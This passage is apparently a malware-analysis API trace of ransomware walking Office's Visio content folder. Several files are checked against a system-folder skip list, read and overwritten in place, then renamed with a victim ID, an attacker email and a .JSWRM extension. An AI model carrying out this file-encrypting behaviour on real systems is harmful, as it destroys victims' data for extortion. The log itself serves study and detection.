lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ASSOCIATIONS_UML_CLASS_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\associations_uml_class_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.307] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16dce02, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x16dce02, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1702fda, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x165f7, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="AUDIT_M.VSSX", cAlternateFileName="AUDIT_~1.VSS")) returned 1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2=".") returned 1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="..") returned 1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="...") returned 1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="windows") returned -1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="recovery") returned -1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="perflogs") returned -1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="documents and settings") returned -1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="system volume information") returned -1 [0144.307] lstrcmpiW (lpString1="AUDIT_M.VSSX", lpString2="msocache") returned -1 [0144.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.310] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=91639) returned 1 [0144.310] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.311] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x165f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x165f0, lpOverlapped=0x0) returned 1 [0144.318] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.318] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x165f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x165f0, lpOverlapped=0x0) returned 1 [0144.319] CloseHandle (hObject=0x314) returned 1 [0144.320] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.322] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5004, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="AUDIT_M.VSTX", cAlternateFileName="AUDIT_~1.VST")) returned 1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2=".") returned 1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="..") returned 1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="...") returned 1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="windows") returned -1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="recovery") returned -1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="perflogs") returned -1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="documents and settings") returned -1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.322] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="system volume information") returned -1 [0144.323] lstrcmpiW (lpString1="AUDIT_M.VSTX", lpString2="msocache") returned -1 [0144.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0144.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0144.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.324] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20484) returned 1 [0144.324] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.324] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5000, lpOverlapped=0x0) returned 1 [0144.327] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.328] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5000, lpOverlapped=0x0) returned 1 [0144.328] CloseHandle (hObject=0x314) returned 1 [0144.328] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.329] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd0d5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="AUDIT_SEVERAL_OUTCOMES_M.VSTX", cAlternateFileName="AUDIT_~2.VST")) returned 1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2=".") returned 1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="..") returned 1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="...") returned 1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="windows") returned -1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="recovery") returned -1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="perflogs") returned -1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="documents and settings") returned -1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="system volume information") returned -1 [0144.329] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpString2="msocache") returned -1 [0144.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SEVERAL_OUTCOMES_M.VSTX", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0144.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SEVERAL_OUTCOMES_M.VSTX", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpUsedDefaultChar=0x0) returned 29 [0144.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SEVERAL_OUTCOMES_M.VSTX", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0144.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SEVERAL_OUTCOMES_M.VSTX", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_SEVERAL_OUTCOMES_M.VSTX", lpUsedDefaultChar=0x0) returned 29 [0144.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SEVERAL_OUTCOMES_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_several_outcomes_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.331] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=53461) returned 1 [0144.331] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.331] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd0d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xd0d0, lpOverlapped=0x0) returned 1 [0144.336] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.336] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd0d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xd0d0, lpOverlapped=0x0) returned 1 [0144.337] CloseHandle (hObject=0x314) returned 1 [0144.337] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SEVERAL_OUTCOMES_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_several_outcomes_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SEVERAL_OUTCOMES_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_several_outcomes_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.338] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xce63, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="AUDIT_SEVERAL_OUTCOMES_U.VSTX", cAlternateFileName="AUDIT_~3.VST")) returned 1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2=".") returned 1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="..") returned 1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="...") returned 1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="windows") returned -1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="recovery") returned -1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="perflogs") returned -1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="documents and settings") returned -1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="system volume information") returned -1 [0144.338] lstrcmpiW (lpString1="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpString2="msocache") returned -1 [0144.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SEVERAL_OUTCOMES_U.VSTX", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0144.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SEVERAL_OUTCOMES_U.VSTX", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpUsedDefaultChar=0x0) returned 29 [0144.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SEVERAL_OUTCOMES_U.VSTX", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0144.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SEVERAL_OUTCOMES_U.VSTX", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_SEVERAL_OUTCOMES_U.VSTX", lpUsedDefaultChar=0x0) returned 29 [0144.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SEVERAL_OUTCOMES_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_several_outcomes_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.339] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=52835) returned 1 [0144.339] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.339] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xce60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xce60, lpOverlapped=0x0) returned 1 [0144.344] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.344] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xce60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xce60, lpOverlapped=0x0) returned 1 [0144.345] CloseHandle (hObject=0x314) returned 1 [0144.345] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SEVERAL_OUTCOMES_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_several_outcomes_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SEVERAL_OUTCOMES_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_several_outcomes_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.346] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xeb65, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="AUDIT_SUBPROCESS_M.VSTX", cAlternateFileName="AUDIT_~4.VST")) returned 1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2=".") returned 1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="..") returned 1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="...") returned 1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="windows") returned -1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="recovery") returned -1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="perflogs") returned -1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="documents and settings") returned -1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="system volume information") returned -1 [0144.346] lstrcmpiW (lpString1="AUDIT_SUBPROCESS_M.VSTX", lpString2="msocache") returned -1 [0144.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SUBPROCESS_M.VSTX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SUBPROCESS_M.VSTX", cchWideChar=23, lpMultiByteStr=0x241178, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_SUBPROCESS_M.VSTX", lpUsedDefaultChar=0x0) returned 23 [0144.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SUBPROCESS_M.VSTX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AUDIT_SUBPROCESS_M.VSTX", cchWideChar=23, lpMultiByteStr=0x240f20, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AUDIT_SUBPROCESS_M.VSTX", lpUsedDefaultChar=0x0) returned 23 [0144.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\AUDIT_SUBPROCESS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\audit_subprocess_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.347] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=60261) returned 1 [0144.348] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.348] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xeb60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xeb60, lpOverlapped=0x0) returned 1 [0144.353] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.353] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xeb60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xeb60, lpOverlapped=0x0) returned 1 [0144.354] CloseHandle (hObject=0x314) returned 1 